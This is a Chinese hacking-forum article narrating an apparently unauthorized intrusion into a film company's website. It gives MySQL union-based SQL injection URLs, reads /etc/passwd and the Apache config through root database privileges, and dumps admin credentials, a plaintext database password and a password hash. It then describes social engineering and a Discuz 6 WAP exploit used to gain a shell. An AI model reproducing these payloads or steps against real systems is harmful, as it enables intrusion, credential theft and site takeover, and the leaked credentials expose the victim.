作品发布     邀请码    设为首页  收藏 

当前位置:文章提权渗透 → 文章内容 >> 安全检测国内某著名电影公司


安全检测国内某著名电影公司

更新时间:2012-2-18 16:11:47   作者:华中帝国整理  来源:华中帝国
作者:冷月渡云 QQ:1352493918 今天无聊检测安以轩加入的公司,在国内也很知名。我们先来打开这个网站!希望大家别去破坏。 http://www.lengyueduyun.com/news/show.php?id=457 and 1=1/* an ...

    作者:冷月渡云

    QQ:1352493918

    今天无聊检测安以轩加入的公司,在国内也很知名。我们先来打开这个网站!希望大家别去破坏。

    http://www.lengyueduyun.com/news/show.php?id=457 and 1=1/* and 1=2 /* 各自返回不一样

    http://www.lengyueduyun.com/news/show.php?id=457 order by 14 /* 回显正常

    http://www.lengyueduyun.com/news/show.php?id=457 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14/*出现了关键字2和5

    看到这个/* 这个在MYSQL是注释符号 其中还有# 与-- #在URL用%23去提交-----这句很无聊!

    通过注射得到、当前用户root@localhost、当前数据库版本 5.0.45、当前库为xxx_cms!

    user()、version()、database() --------这些都是MYSQL的内置函数,其实还有几个啦!这句多余...

    简单地检测当前要获取一些重要数据.通过注射!数据都存在user表。得到了不少的后台管理员重要信息~

    但是获取到了管理员的账户密码有什么用?后台找不到!用wwwscan扫描了下没有什么敏感目录,这里考虑到当前用户权限为ROOT我们可以尝试下读取敏感文件!

    读取/etc/passwd

    root:x:0:0:root:/root:/bin/bash

    bin:x:1:1:bin:/bin:/sbin/nologin

    daemon:x:2:2:daemon:/sbin:/sbin/nologin

    adm:x:3:4:adm:/var/adm:/sbin/nologin

    lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin

    sync:x:5:0:sync:/sbin:/bin/sync

    shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown

    halt:x:7:0:halt:/sbin:/sbin/halt

    mail:x:8:12:mail:/var/spool/mail:/sbin/nologin

    news:x:9:13:news:/etc/news:

    uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin

    operator:x:11:0:operator:/root:/sbin/nologin

    games:x:12:100:games:/usr/games:/sbin/nologin

    gopher:x:13:30:gopher:/var/gopher:/sbin/nologin

    ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin

    nobody:x:99:99:Nobody:/:/sbin/nologin

    rpm:x:37:37::/var/lib/rpm:/sbin/nologin

    dbus:x:81:81:System message bus:/:/sbin/nologin

    avahi:x:70:70:Avahi daemon:/:/sbin/nologin

    mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin

    smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin

    nscd:x:28:28:NSCD Daemon:/:/sbin/nologin

    vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin

    rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin

    rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin

    nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin

    sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin

    pcap:x:77:77::/var/arpwatch:/sbin/nologin

    ntp:x:38:38::/etc/ntp:/sbin/nologin

    haldaemon:x:68:68:HAL daemon:/:/sbin/nologin

    xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin

    sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin

    apache:x:48:48:Apache:/var/www:/sbin/nologin

    mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash

    www:x:80:80::/home/www:/bin/bash

    mq:x:0:0::/home/mq:/bin/bash

    #chinaui:x:80:80::/www:/sbin/nologin

    ftpdownres:x:80:80::/www/test/res:/sbin/nologin

    hbstars:x:80:80::/www/lujing/:/sbin/nologin

    chinauiadmin:x:80:80::/www:/sbin/nologin

    /www/lujing 读取下文件/www/lujing/index.php 读取失败?这个不是绝对路径!

    读取/etc/httpd/conf/httpd.conf 读取apache文件获取多个子域名与绝对路径~~原来当前网站的路径是。

    <VirtualHost 127.0.0.1:81>

    DocumentRoot /www/hbstart/www/

    ServerName www.lengyueduyun.com

    AddType text/html .html

    AddOutputFilter INCLUDES .html

    <Directory /www/lujing/www/>

    php_value auto_prepend_file "/www/lujing/cms/frame/global.inc.php"

    </Directory>

    </VirtualHost>

    /www/lujing/www/index.php 读取成功,尝试读出寄放MYSQL账户与密码的文件.以下文件发觉都不存在!

    /www/lujing/www/config.php /www/lujing/www/conn.php /www/lujing/www/include/conn.php

    /www/lujing/cms/frame/global.inc.php

    之后在apache文件里看到几个子域名好奇地输入到IE上面去.发觉..这是管理这个网站后台的子域名

    <VirtualHost 127.0.0.1:81>

    DocumentRoot /www/lujing/cms

    ServerName admin.lengyueduyun.com

    AddType text/html .html

    AddOutputFilter INCLUDES .html

    <Directory /www/lujing/cms>

    php_value auto_prepend_file "/www/lujing/cms/frame/global.inc.php"

    </Directory>

    </VirtualHost>

    用了注射出来的账户与密码成功进入后台.

    但是拿不到shell,无论怎么上传都被转换为jpg格式!挺郁闷的此时..之后从apache看到一个DZ论坛,版本不太清楚.

    <VirtualHost 127.0.0.1:81>

    DocumentRoot /www/test/bbs/

    ServerName forum.xxxx.com

    AddType text/html .html

    AddOutputFilter INCLUDES .html

    ErrorDocument 404 http://forum.xxxx.com/images/avatars/noavatar.gif

    <Directory /www/test/bbs>

    /www/test /bbs/config.inc.php读取此文件获得了mysql的账户密码!但可悲的是?不支持外联也找不到phpmyadmin

    开始以为会不会也用一个子域名去管理自己的MYSQL,发觉也不是!运气总是没那么好~想到社工下看看

    $dbhost = 'localhost';    // 数据库服务器

    $dbuser = 'ui_bbs';    // 数据库用户名

    $dbpw = '1107ui1107';    // 数据库密码

    $dbname = 'xxx_bbs';    // 数据库名

    $pconnect = 0;     // 数据库持久连接 0=关闭, 1=打开

    测试了几个管理员,用了 MYSQL的一些账户密码发觉没一个成功的...为什么那么笨蛋?从注射点里可以跨库查询该论坛的东西~~获取跨库查询其他网站的账户信息~首先在这个论坛下手!百度下存放的表却在注射你找不到当前的表!

    习惯每个库都读取下,之后再XXXX_www 这个库是主站的~可能社工下有点希望~MYSQL5以上才可以

    pwd:b501bc6960e3d326b41676ab^uname:Bluesky 主站的管理员与密码!MD5收费的,感谢龙儿心了

    随即社工下论坛啦,果然让我成功了!

    记得狼族好像发过一个DZ6 拿shell的文章,我对DZ论坛很小白的!模板编辑,可是当前说了不允许后台编辑..只允许在里面编辑!拿不到shell了这次真的晕了..这里困扰我很久!

    我进去后台的时候,里面提示安全补丁的...当前版本还是6.0的呢

    最后脑袋清醒地想下,WAP这玩意!大家都知道DZ的WAP默认是关闭的!我们把他开启啦.测试下Oday

    发现成功了~~

    没什么技术含量~~拜拜了MYSQL5真强大

责任编辑:华中帝国        



本文引用网址: 

安全检测国内某著名电影公司的相关文章
发表评论

用户名: 查看更多评论

分 值:100分 85分 70分 55分 40分 25分 10分 0分

内 容:

         (注“”为必填内容。) 验证码: 验证码,看不清楚?请点击刷新验证码